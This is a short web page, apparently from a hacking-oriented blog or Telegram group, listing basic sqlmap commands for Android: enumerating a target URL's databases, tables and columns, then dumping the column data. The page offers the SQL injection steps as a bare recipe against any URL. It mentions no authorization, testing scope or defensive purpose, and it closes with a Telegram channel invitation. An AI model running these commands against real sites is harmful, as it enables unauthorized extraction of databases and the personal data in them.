Sqlmap basic Commands on android



 For fetching available Database
>python2 sqlmap.py -u <url> --dbs 
For fetching available Tables on Database
>python2 sqlmap.py -u <url> -D <name of database> --tables
For fetching available Columns in Tables
>python2 sqlmap.py -u <url> -D <name of database> -T <name of table> --columns
For dumping the data available in columns
>python2 sqlmap.py -u <url> -D <name of database> -T <name of table> -C <name of column> --dump


Video Tutorial 

 
 

Comments

Join us: t.me/Xpykerz

Share And Support